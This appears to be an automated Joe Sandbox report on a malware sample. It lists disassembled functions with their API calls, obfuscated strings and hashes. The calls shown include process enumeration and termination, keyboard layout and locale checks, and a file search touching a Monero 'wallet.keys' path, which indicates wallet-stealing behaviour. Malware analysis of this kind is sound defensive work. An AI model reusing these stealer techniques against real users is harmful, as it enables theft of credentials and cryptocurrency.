                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                        • String ID:
                                        • API String ID: 2696918072-0
                                        • Opcode ID: b52c39f95d38a2b6b6aa25a7ecce09159547fbdffc1b58a45155895e590fe6a4
                                        • Instruction ID: f6e28213a2b7133c9a9781848a039bd15d6274d34f57ce3a1e52000c3b987e9f
                                        • Opcode Fuzzy Hash: b52c39f95d38a2b6b6aa25a7ecce09159547fbdffc1b58a45155895e590fe6a4
                                        • Instruction Fuzzy Hash: F8111C75A04308EBCB24DFA5EC48BDDB7B9AB48705F0045ECF509A6240DB74DA84CF95
                                        Function 00197D20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0019AA50: lstrcpy.KERNEL32(001A0E1A,00000000), ref: 0019AA98
                                        • GetKeyboardLayoutList.USER32(00000000,00000000,001A05B7), ref: 00197D71
                                        • LocalAlloc.KERNEL32(00000040,?), ref: 00197D89
                                        • GetKeyboardLayoutList.USER32(?,00000000), ref: 00197D9D
                                        • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00197DF2
                                        • LocalFree.KERNEL32(00000000), ref: 00197EB2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                        • String ID: /
                                        • API String ID: 3090951853-4001269591
                                        • Opcode ID: e8bae0038d4748474ad9f89c3fac5a585d4c5a02c772c76ba9a8c7aa7f9b10f3
                                        • Instruction ID: 8e75050267e2e6f833d541c903ff2ce5b11c095b6771d5fde4b2ba0be7dfbb84
                                        • Opcode Fuzzy Hash: e8bae0038d4748474ad9f89c3fac5a585d4c5a02c772c76ba9a8c7aa7f9b10f3
                                        • Instruction Fuzzy Hash: 3C417E71944218ABCF24DB94DC99BEEB374FF58700F5041D9E00A66281DB346F88CFA1
                                        Function 005D0F92 Relevance: 10.4, Strings: 7, Instructions: 1626COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: -?v$8KZ^$AOC?$QF'N$RPOY$j9UF$Q*4
                                        • API String ID: 0-1770485053
                                        • Opcode ID: 2310ca11c32512910d0cd15c8819ef24ebedaecdd17a21226bad3f5a3801e111
                                        • Instruction ID: 85ef224d776762f501d17abc1e6337b3c05ae9bcfd6d36c8fab1fcb3cf8ba393
                                        • Opcode Fuzzy Hash: 2310ca11c32512910d0cd15c8819ef24ebedaecdd17a21226bad3f5a3801e111
                                        • Instruction Fuzzy Hash: 53B2F5F3A0C2009FE708AE29EC9567AFBE9EF94320F16493DE6C5C3744E63558418697
                                        Function 005DB26C Relevance: 10.4, Strings: 7, Instructions: 1609COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: *w??$,o~$>Pw"$]CI$]h1_$v\~$KWV
                                        • API String ID: 0-3831577768
                                        • Opcode ID: 7cbf97926c21698546e53b586a20138e01a74374410c3ea259355f5c0d3bd06c
                                        • Instruction ID: 9b107035965083f4dbc7310dbbe0b3904ea8a274674b3da87250f20fac278bad
                                        • Opcode Fuzzy Hash: 7cbf97926c21698546e53b586a20138e01a74374410c3ea259355f5c0d3bd06c
                                        • Instruction Fuzzy Hash: 9CB2E8F36082009FE704AE2DEC8567ABBE5EFD4720F1A893DE6C4C7744EA3558058697
                                        Function 0018E530 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0019AA50: lstrcpy.KERNEL32(001A0E1A,00000000), ref: 0019AA98
                                          • Part of subcall function 0019AC30: lstrcpy.KERNEL32(00000000,?), ref: 0019AC82
                                          • Part of subcall function 0019AC30: lstrcat.KERNEL32(00000000), ref: 0019AC92
                                          • Part of subcall function 0019ACC0: lstrlen.KERNEL32(?,011C9288,?,\Monero\wallet.keys,001A0E1A), ref: 0019ACD5
                                          • Part of subcall function 0019ACC0: lstrcpy.KERNEL32(00000000), ref: 0019AD14
                                          • Part of subcall function 0019ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0019AD22
                                          • Part of subcall function 0019ABB0: lstrcpy.KERNEL32(?,001A0E1A), ref: 0019AC15
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,001A0D79), ref: 0018E5A2
                                        • StrCmpCA.SHLWAPI(?,001A15F0), ref: 0018E5F2
                                        • StrCmpCA.SHLWAPI(?,001A15F4), ref: 0018E608
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0018ECDF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                        • String ID: \*.*
                                        • API String ID: 433455689-1173974218
                                        • Opcode ID: b7178566b6c4deeb5af716e4a6edb239d504c1731b8002f723c046b8cd5f9119
                                        • Instruction ID: 0466575b01273bac8cf8d688c0607e84044bd074440d023330b812cef7f23536
                                        • Opcode Fuzzy Hash: b7178566b6c4deeb5af716e4a6edb239d504c1731b8002f723c046b8cd5f9119
                                        • Instruction Fuzzy Hash: E212ED72A141189BCF19FB60DDA6AED7379AF65300F8045A9B50B66091EF306B4CCFD2
                                        Function 005DD329 Relevance: 8.5, Strings: 6, Instructions: 1045COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: &m}$(4g$4b>-$]={>$g{$qus~
                                        • API String ID: 0-1412593970
                                        • Opcode ID: 4c11713fac40f0ff702655c788483812e468d3ebbd7c787f107e68ab3b972cf9
                                        • Instruction ID: 81640a5ed91fbcfb8c760ac6d6b5cd05723df95a76ac94ae7a2e189ed530fbed
                                        • Opcode Fuzzy Hash: 4c11713fac40f0ff702655c788483812e468d3ebbd7c787f107e68ab3b972cf9
                                        • Instruction Fuzzy Hash: 9272D4F390C204AFE7046E29DC8576ABBE9EF94720F1A493DEAC4C3744E63598418797
                                        Function 005DF102 Relevance: 8.3, Strings: 6, Instructions: 791COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: #G{w$E~}$Nd,x$T~3o$Tov$e4uo
                                        • API String ID: 0-4046128984
                                        • Opcode ID: 6e9735fe184f11771c082b8102dd4df3b79f2109ec477cca8f6faa81c3d89e94
                                        • Instruction ID: 9d1ccc6d7d1f2d7b9b0c4e7ecbfdc28a7a577becd4c29259986c38f4907d986d
                                        • Opcode Fuzzy Hash: 6e9735fe184f11771c082b8102dd4df3b79f2109ec477cca8f6faa81c3d89e94
                                        • Instruction Fuzzy Hash: 1332E6F360C200AFE704AE2DEC8577ABBE5EF94320F16893DE6C583744E67598058697
                                        Function 005D6024 Relevance: 7.9, Strings: 5, Instructions: 1655COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: ".|$Ks$=$Mj^$^Uvn$hzR{
                                        • API String ID: 0-4159268604
                                        • Opcode ID: a73d7b9f471ce8fc837e728cbdc97d39de57d6375dcad2387302f42db2dae3eb
                                        • Instruction ID: 8077d5fa77197c815cad94dc7116f587e03ae1144879701337ffff0814c54d21
                                        • Opcode Fuzzy Hash: a73d7b9f471ce8fc837e728cbdc97d39de57d6375dcad2387302f42db2dae3eb
                                        • Instruction Fuzzy Hash: C7B24AF360C2049FE3086E2DEC8567ABBE5EF94720F1A463DE6C5C7740EA3598058796
                                        Function 005CD9F1 Relevance: 7.9, Strings: 5, Instructions: 1648COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: +Tgv$A-}O$B,}O$g?$w-:
                                        • API String ID: 0-3034431403
                                        • Opcode ID: e02bd54f123f0387664a70a7b1c3b52b8fe914c0e5a28fb543481dc284f654bc
                                        • Instruction ID: d697a3e3c77355f6e2d2c72975326b698227c59837e3ed1a0addab0b49246f80
                                        • Opcode Fuzzy Hash: e02bd54f123f0387664a70a7b1c3b52b8fe914c0e5a28fb543481dc284f654bc
                                        • Instruction Fuzzy Hash: C1B2F8F3A0C2049FE3046E2DEC8566AFBEAEFD4320F1A853DE6C4C7744E67558058696
                                        Function 005C54A6 Relevance: 7.9, Strings: 5, Instructions: 1614COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: 6:n$]EyM$]pg${3g${m6_
                                        • API String ID: 0-620376452
                                        • Opcode ID: abadf48c459c55a1933d33dc04c9fbf46968a6adb13e17aedc243708a5260a11
                                        • Instruction ID: ed0f94b571a88ca5d4359264fbac8b4f1aa450b4acc5fe65a90f0be9a7ce5efa
                                        • Opcode Fuzzy Hash: abadf48c459c55a1933d33dc04c9fbf46968a6adb13e17aedc243708a5260a11
                                        • Instruction Fuzzy Hash: 62B209F360C200AFE3046E29EC8567AF7E9EF94720F2A893DE5C5C7744E63598418696
                                        Function 001EF8D6 Relevance: 7.6, Strings: 6, Instructions: 123COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: \u$\u${${$}$}
                                        • API String ID: 0-582841131
                                        • Opcode ID: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                                        • Instruction ID: 3288df32f7e6b286c7d844da34f0d8d9511b3707091c4b5fd3acba83598aecfb
                                        • Opcode Fuzzy Hash: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
